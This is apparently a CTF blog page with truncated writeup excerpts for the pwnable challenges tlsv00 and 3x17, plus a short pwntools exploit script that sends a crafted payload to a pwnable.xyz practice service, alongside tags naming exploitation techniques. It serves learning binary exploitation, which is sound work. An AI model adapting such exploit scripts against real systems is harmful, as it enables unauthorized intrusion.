Writeup: tlsv00
We begin by looking at the protections of the binary. We have several problems and we can not execute code in the stack due to NX protection and we do not see the possibility of an overflow due to canary. We also have PIE activated and full relro so GOT dereferencing/overwriting will not be possible. We start with option 3 that will call the print_flag function. If we see inside the function we ..
Writeup: 3x17
We will start by looking at the protections of the binary and we realize that NX is enabled so it will not let us execute code in memory. First we see that our attack vector are two inputs but we do not know the iteration that the program returns to us. So we will have to open gdb and analyze the code in search of how to exploit it and perform the important task of reverse engineering. After see..
Exploit from pwn import * context.log_level = 'debug' p = remote("svc.pwnable.xyz",30031) #p = process('./two_targets') #gdb.attach(p,''' #break *0x00400bd1 #continue #''') payload = "Did_you_really_miss_the_"+"\xc8"+"T_b"+"\x7f"+"D"+"\x84"+"\xf3" p.recvuntil("> ") p.sendline("1") p.recvuntil("name: ") p.sendline(payload) p.recvuntil("> ") p.sendline("4") p.recvuntil("> ") p.interactive()
- Total
- Today
- Yesterday
- pwnable.xyz
- leak libc
- x64dbg
- ASM
- theFaunia course
- Backdoors
- XSS
- dnspy
- Pwnable.kr
- pwnable.tw
- write primitive
- buffer overflow
- canary
- cracking
- Call oriented programming
- arithmetic overflow/underflow
- html injection
- open-redirect
- shellcode
- fake stack frame
- leak stack memory address
- GOT Dereferencing/Overwriting
- format string
- Windows
- one gadget
- 32Bit
- hijacking redirection flow
- use after free
- stack pivot
- return oriented programming
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | |||||
| 3 | 4 | 5 | 6 | 7 | 8 | 9 |
| 10 | 11 | 12 | 13 | 14 | 15 | 16 |
| 17 | 18 | 19 | 20 | 21 | 22 | 23 |
| 24 | 25 | 26 | 27 | 28 | 29 | 30 |
| 31 |